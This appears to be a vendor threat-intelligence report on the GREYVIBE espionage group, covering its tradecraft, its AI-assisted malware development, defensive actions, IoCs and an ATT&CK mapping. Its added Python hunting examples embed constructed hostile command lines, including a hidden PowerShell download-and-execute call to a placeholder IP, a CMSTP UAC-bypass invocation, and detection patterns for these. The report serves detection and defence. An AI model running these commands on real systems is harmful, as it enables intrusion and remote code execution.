Vibe-Coding the Kill Chain: The GREYVIBE Story

TA2026153 — GREYVIBE Actor Report: Vibe-Coding the Kill Chain | HiveForce Labs


Threat level: Amber
Actor: GREYVIBE
Origin: Russia-nexus
Platform: Windows · Android
Active since: August 2025
Tooling: GenAI-assisted
Admiralty: A1
Attack commenced: August 2025
TA number: TA2026153
Motive: Information theft · Espionage
Targeted regions: Ukraine · Moldova · Romania · Brazil · Venezuela · Guinea
Targeted industries: Military · Government · Defense · Energy · NGOs · Software suppliers
Campaigns: PhantomMail · PhantomClick · PrincessClub · DroneLink · Nebo

GREYVIBE is a Russia-nexus threat group that has targeted Ukraine and Ukraine-related entities since at least August 2025, with development and testing dating back to April 2025. WithSecure assesses with high confidence that its operators are Russian-speaking, working in the Moscow time zone, with lures, victimology, and objectives aligned with Russian state interests — chiefly intelligence collection tied to the Russia-Ukraine conflict.

The group's defining characteristic is the systematic use of generative AI — Ideogram AI, ChatGPT, and Google Gemini — for lure imagery, site building, obfuscator and full-stack RAT development, infrastructure setup, and post-compromise scripting. GREYVIBE operates five concurrent campaigns using PhantomRelay (PowerShell RAT), LegionRelay (lightweight PowerShell RAT), and FallSpy (Android spyware), all obfuscated with a suite of custom obfuscators including LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP.

GREYVIBE — profile and tradecraft

Name: GREYVIBE
Origin: Russia
Target countries: Ukraine, Moldova, Romania, Brazil, Venezuela, Guinea
Target industries: Military, Government, Defense, Energy, Civilian individuals, NGOs, Business entities, Software supplier
Motive: Information theft, Espionage

Active campaigns and malware families:

Campaigns: PhantomMail · PhantomClick · PrincessClub · DroneLink · Nebo
Malware: PhantomRelay (Lite / V1 / V2) · FallSpy · LegionRelay
Obfuscators: LOOKVALPS · LOOKVALJS · DAYLIGHT · TEASOUP

01. Attribution — Russia-nexus, Moscow time zone, state-aligned objectives

GREYVIBE has targeted Ukraine and Ukraine-related entities since at least August 2025, with development and testing observable from April 2025. WithSecure assesses with high confidence that operators are Russian-speaking and active in the Moscow time zone. The group's lures, victimology, and collection objectives align with Russian state interests, primarily intelligence gathering tied to the Russia-Ukraine conflict. Targeting has since expanded to Moldova, Romania, Brazil, Venezuela, and Guinea — consistent with broader Russian intelligence interest areas.

02. Five initial access vectors across concurrent campaigns

GREYVIBE operates five simultaneous campaigns with distinct delivery mechanisms. PhantomMail delivers malicious ZIP/RAR archives via spear-phishing links to Google Drive and 4sync. PhantomClick uses ClickFix fake-CAPTCHA pages impersonating Zoom and LAPAS. PrincessClub combines fake Ukrainian social-club websites with fake female Telegram personas to lure targets into downloading malware. DroneLink uses drone-themed fake charity sites to deliver payloads. Nebo employs a Russian-language "SPO NEBO" lure targeting military-adjacent personnel.

03. Unified Windows infection chain — lure → bundle → loader → payload → decoy

Every campaign follows the same Windows execution chain: a lure triggers a bundle that runs a loader showing a decoy — a PDF, a fake error pop-up, or a lure site — while the infection proceeds silently. In the script-based chain, a VBScript launcher fires a hidden PowerShell script. Both paths deploy the primary Windows payloads: PhantomRelay, a PowerShell RAT using a two-stage fingerprint-then-client model over WebSockets, and LegionRelay, a lightweight PowerShell RAT communicating over a REST API. FallSpy is the Android spyware used in the PrincessClub and Nebo campaigns. PhantomRelay also achieves lateral spread via USB using hidden files and malicious shortcuts.

04. Custom obfuscation suite — AMSI patching and ETW tampering

All payloads are obfuscated with GREYVIBE's custom obfuscator suite: LOOKVALPS (PowerShell), LOOKVALJS (JavaScript), DAYLIGHT, and TEASOUP. The PhantomRelayLite base variant adds SAWDUST and CRUDEDUST components which patch AMSI and tamper with the ETW provider to blind Windows telemetry and bypass script-block logging. Persistence is maintained primarily through scheduled tasks driven by a watchdog script, with a short-lived Startup folder shortcut variant as a secondary mechanism.

05. Privilege escalation and lateral movement — UAC bypass, RDP, hidden accounts

GREYVIBE achieves privilege escalation through three techniques: shortcut hijacking that fires a UAC prompt from a trusted icon; a CMSTP-based UAC bypass (cmstp.exe with a custom .INF file); and a custom .NET component masquerading as "Windows Update" that baits a UAC approval to re-register LegionRelay's scheduled task as SYSTEM. For lateral movement, operators enable persistent RDP, create hidden local administrator accounts concealed via the SpecialAccounts\UserList registry key, and share local disks over SMB.

06. C2 infrastructure and GenAI-assisted development — the defining GREYVIBE trait

PhantomRelay C2 has rotated across EDIS Global, KVMka, Cloudzy, and the suspected bulletproof host Global Connectivity Solutions LLP. FallSpy and LegionRelay C2 infrastructure remained on Baxet Group Inc. servers with Russian-language admin panels. The defining characteristic of GREYVIBE is its systematic use of generative AI: Ideogram AI for lure imagery and site design, ChatGPT and Google Gemini for obfuscator and full-stack RAT development, infrastructure provisioning guidance, and post-compromise scripting — representing an operational maturity shift enabled by commercial AI tooling.

What to do now

Four prioritised defensive actions for security and operations teams, ordered by detection impact.

1. Restrict archive and script execution from email and file-sharing links

Treat ZIP/RAR archives delivered via links to Google Drive, 4sync, and similar services as high-risk. Block or sandbox execution of double-extension files (e.g., .pdf.js, .XLS.js, .Docx.rar). Disable or tightly control the Windows Script Host (wscript.exe / cscript.exe) for JavaScript loaders. Apply mail gateway rules to flag messages with archive links to consumer file-sharing services targeting government or military recipients.

2. Constrain PowerShell and LOLBIN abuse

Enable PowerShell Constrained Language Mode, script block and module logging, and transcription. Hunt for conhost.exe launched with the --headless parameter spawning PowerShell, for Invoke-Expression on remotely fetched content, and for command-history suppression via Set-PSReadlineOption -HistorySaveStyle SaveNothing and Remove-Module PSReadline — both GREYVIBE tradecraft signatures for covering post-execution tracks.
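As an added example (not code from the report or from WithSecure), the Python below encodes the hunting signatures above as rules over constructed process-creation records in a Sysmon Event ID 1-like shape, and folds in the cmstp.exe-with-custom-.INF check from action 4. The field names, the sample events and the address 203.0.113.10 are assumptions of this example.

```python
import re

# Constructed process-creation records in a Sysmon Event ID 1-like shape; not real telemetry.
# Field names (parent, parent_cmd, image, cmd) are assumptions of this example.
EVENTS = [
    {"parent": r"C:\Windows\System32\conhost.exe",
     "parent_cmd": "conhost.exe --headless powershell -w hidden -ep bypass",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://203.0.113.10/stage')\""},
    {"parent": r"C:\Windows\explorer.exe", "parent_cmd": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Set-PSReadlineOption -HistorySaveStyle SaveNothing; Remove-Module PSReadline"},
    {"parent": r"C:\Windows\System32\cmd.exe", "parent_cmd": "cmd.exe",
     "image": r"C:\Windows\System32\cmstp.exe",
     "cmd": r"cmstp.exe /au C:\Users\Public\wu.inf"},
    {"parent": r"C:\Windows\explorer.exe", "parent_cmd": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-Process"},  # benign control case
]

PS_HOSTS = ("powershell.exe", "pwsh.exe")
REMOTE_FETCH = re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|https?://", re.I)
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
HISTORY_OFF = re.compile(r"historysavestyle\s+savenothing|remove-module\s+psreadline", re.I)

RULES = {
    # conhost.exe --headless spawning PowerShell (action 2)
    "headless_conhost_spawns_powershell": lambda e:
        e["parent"].lower().endswith("conhost.exe")
        and "--headless" in e["parent_cmd"].lower()
        and e["image"].lower().endswith(PS_HOSTS),
    # Invoke-Expression over remotely fetched content (action 2)
    "iex_on_remote_content": lambda e:
        e["image"].lower().endswith(PS_HOSTS)
        and bool(IEX.search(e["cmd"])) and bool(REMOTE_FETCH.search(e["cmd"])),
    # PSReadline history suppression used to cover post-execution tracks (action 2)
    "psreadline_history_suppression": lambda e: bool(HISTORY_OFF.search(e["cmd"])),
    # cmstp.exe handed a custom .INF, the CMSTP UAC-bypass shape (action 4)
    "cmstp_custom_inf": lambda e:
        e["image"].lower().endswith("cmstp.exe") and bool(re.search(r"\.inf\b", e["cmd"], re.I)),
}

def evaluate(event):
    """Names of every rule the event trips, in RULES order."""
    return [name for name, rule in RULES.items() if rule(event)]

def hunt(events):
    """Map event index -> tripped rules, only for events that tripped at least one."""
    return {i: r for i, e in enumerate(events) if (r := evaluate(e))}
```

Running `hunt(EVENTS)` flags the first three constructed events and leaves the benign `Get-Process` launch alone; in production the same predicates would run over the process-creation feed rather than the inline list.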

3. Hunt for watchdog and scheduled-task persistence

Alert on creation of scheduled tasks that re-execute scripts on short intervals (e.g., one minute after creation, then every three minutes). Hunt for tasks or loaders masquerading as vendor utilities — Razer, AMD, Adobe, "System Health Service," "Windows Check Updater." Inspect %ProgramData% and %LOCALAPPDATA% staging directories and Startup folder shortcuts for dropped .ps1 payloads, including SysCheckupService.ps1, RzUpdateManager.ps1, and WUDFHost.ps1.

4. Enforce strong UAC and privilege controls

Set UAC to always prompt and monitor for cmstp.exe invoked with custom .INF files. Watch for unexpected runas / RunAsInvoker shortcut modifications and treat sudden "Windows Update"-themed UAC prompts as suspicious. Audit creation of new local administrator accounts and accounts hidden via the SpecialAccounts\UserList registry key — a persistence mechanism GREYVIBE uses to conceal operator-created admin accounts from the Windows login screen.
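As an added example (not the report's or WithSecure's code), the Python below applies the scheduled-task checks from action 3 and the hidden-account check from action 4 to constructed task records and a constructed registry-value-set event. The record field names, the 300-second interval threshold and the sample task and account names are assumptions of this example.

```python
import re

# Constructed scheduled-task records (fields as a defender might export them from
# Get-ScheduledTask / schtasks output); not real telemetry. Field names are assumptions.
TASKS = [
    {"name": r"\Razer Synapse Service Helper", "action": "powershell.exe",
     "args": r"-w hidden -ep bypass -f %LOCALAPPDATA%\Razer Update\RzUpdateManager.ps1", "repeat_s": 180},
    {"name": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "action": r"%windir%\system32\defrag.exe",
     "args": "-c -h -o -$", "repeat_s": 0},  # benign built-in task for contrast
    {"name": r"\AMD Checker", "action": "powershell.exe",
     "args": r"-f C:\ProgramData\AMD\amd.ps1", "repeat_s": 180},
]

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# Vendor / utility names the report lists as task-name masquerades
VENDOR_NAMES = re.compile(r"razer|\bamd\b|adobe|system health|windows check updater|backup", re.I)
# .ps1 payloads staged under %ProgramData% or %LOCALAPPDATA%
STAGING_PS1 = re.compile(r"(%programdata%|c:\\programdata|%localappdata%|\\appdata\\local)\\.*\.ps1", re.I)
SHORT_INTERVAL_S = 300  # report: fires one minute after creation, then every three minutes

def task_findings(task):
    """Return the watchdog / masquerade indicators a task record matches."""
    findings = []
    if VENDOR_NAMES.search(task["name"]) and task["action"].lower().endswith(SCRIPT_HOSTS):
        findings.append("vendor_name_runs_script_host")
    if 0 < task["repeat_s"] <= SHORT_INTERVAL_S:
        findings.append("short_repeat_interval")
    if STAGING_PS1.search(task["action"] + " " + task["args"]):
        findings.append("ps1_in_staging_dir")
    return findings

USERLIST_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"

# Constructed registry-value-set events (Sysmon Event ID 13 shape); the account name is a sample.
REG_EVENTS = [
    {"target": "HKLM\\" + USERLIST_KEY + r"\svc_helper", "details": "DWORD (0x00000000)"},
    {"target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\a\AppData\Local\Updater\Updater.exe"},
]

def hidden_account(event):
    """Account hidden from the logon screen (UserList value set to 0), else None."""
    m = re.search(re.escape(USERLIST_KEY) + r"\\([^\\]+)$", event["target"], re.I)
    if m and re.search(r"0x0+\)?$", event["details"]):
        return m.group(1)
    return None
```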

IoCs — GREYVIBE / PhantomRelay / FallSpy / LegionRelay

Block or monitor all indicators below. All domains, IPs, emails, and URLs are defanged. The complete IoC set is also available via the WithSecure GitHub repository linked in References.

Filenames
  • SysCheckupService.ps1
  • SystemHealthSvc.ps1
  • Configuration.ps1
  • Configurate.ps1
  • WUDFHost.ps1
  • razer_update.log
  • RzUpdateManager.ps1
  • RzTelemetry.ps1
File paths
  • %ProgramData%\WindowSystem
  • %ProgramData%\Microsoft Windows
  • C:\ProgramData\AMD\amd.ps1
  • C:\ProgramData\BackUp\backup.ps1
  • C:\ProgramData\Adobe\dfDgrr3.ps1
  • %LOCALAPPDATA%\Razer Update (staging directory)
Scheduled task names
  • System Health Service
  • Microsoft System Health Service
  • Razer Synapse Service Helper
  • Adobe working
  • BackUp checker
  • AMD Checker

Tactics, techniques & sub-techniques

Full MITRE ATT&CK mapping for GREYVIBE across all five campaigns and both Windows and Android platforms.

ID | Tactic | Technique / sub-technique
T1583.001 | Resource development | Acquire infrastructure — domains
T1584.001 | Resource development | Compromise infrastructure — domains
T1585.001 | Resource development | Establish accounts — social media accounts (fake Telegram personas)
T1585.002 | Resource development | Establish accounts — email accounts
T1587.001 | Resource development | Develop capabilities — malware (GenAI-assisted RAT development)
T1588.002 | Resource development | Obtain capabilities — tool
T1608.001 | Resource development | Stage capabilities — upload malware
T1566.002 | Initial access | Phishing — spearphishing link (Google Drive / 4sync archives)
T1566.001 | Initial access | Phishing — spearphishing attachment
T1566.003 | Initial access | Phishing — spearphishing via service (Telegram personas)
T1091 | Initial access | Replication through removable media (PhantomRelay USB spread)
T1204.001 | Execution | User execution — malicious link
T1204.002 | Execution | User execution — malicious file
T1204.004 | Execution | User execution — malicious copy and paste (ClickFix)
T1059.001 | Execution | Command and scripting interpreter — PowerShell (PhantomRelay / LegionRelay)
T1059.007 | Execution | Command and scripting interpreter — JavaScript (LOOKVALJS)
T1053.005 | Execution | Scheduled task/job — scheduled task (watchdog tasks)
T1202 | Execution | Indirect command execution
T1053.005 | Persistence | Scheduled task/job — scheduled task (watchdog re-registration)
T1547.001 | Persistence | Boot or logon autostart execution — registry run keys / startup folder
T1136.001 | Persistence | Create account — local account (hidden admin accounts)
T1548.002 | Privilege escalation | Abuse elevation control mechanism — bypass UAC (CMSTP, fake Windows Update)
T1547.009 | Privilege escalation | Boot or logon autostart execution — shortcut modification (UAC hijacking)
T1027.006 | Defense evasion | Obfuscated files or information — HTML smuggling
T1140 | Defense evasion | Deobfuscate/decode files or information (LOOKVALPS / DAYLIGHT / TEASOUP)
T1562.001 | Defense evasion | Impair defenses — disable or modify tools (SAWDUST AMSI patch)
T1070.003 | Defense evasion | Indicator removal — clear command history (PSReadline removal)
T1497 | Defense evasion | Virtualization/sandbox evasion
T1564.001 | Defense evasion | Hide artifacts — hidden files and directories (USB spread)
T1564.002 | Defense evasion | Hide artifacts — hidden users (SpecialAccounts\UserList)
T1218.003 | Defense evasion | System binary proxy execution — CMSTP (UAC bypass)
T1036.005 | Defense evasion | Masquerading — match legitimate name or location (Razer, AMD, Adobe task names)
T1480 | Defense evasion | Execution guardrails
T1003.002 | Credential access | OS credential dumping — Security Account Manager
T1555.003 | Credential access | Credentials from password stores — credentials from web browsers
T1539 | Credential access | Steal web session cookie
T1056.001 | Credential access | Input capture — keylogging
T1082 | Discovery | System information discovery
T1033 | Discovery | System owner/user discovery
T1083 | Discovery | File and directory discovery
T1016 | Discovery | System network configuration discovery
T1518 | Discovery | Software discovery
T1113 | Collection | Screen capture
T1005 | Collection | Data from local system
T1119 | Collection | Automated collection
T1560.001 | Collection | Archive collected data — archive via utility
T1123 | Collection | Audio capture (FallSpy — Android)
T1125 | Collection | Video capture (FallSpy — Android)
T1636.003 | Collection | Protected user data — contact list (FallSpy — Android)
T1636.002 | Collection | Protected user data — call log (FallSpy — Android)
T1430 | Collection | Location tracking (FallSpy — Android)
T1071.001 | Command and control | Application layer protocol — web protocols (WebSocket / REST API)
T1102.001 | Command and control | Web service — dead drop resolver
T1132.001 | Command and control | Data encoding — standard encoding
T1572 | Command and control | Protocol tunneling
T1090 | Command and control | Proxy
T1219 | Command and control | Remote access software (persistent RDP)
T1021.001 | Lateral movement | Remote services — Remote Desktop Protocol
T1021.002 | Lateral movement | Remote services — SMB/Windows admin shares (local disk sharing)
T1041 | Exfiltration | Exfiltration over C2 channel
T1496.001 | Impact | Resource hijacking — compute hijacking

Sources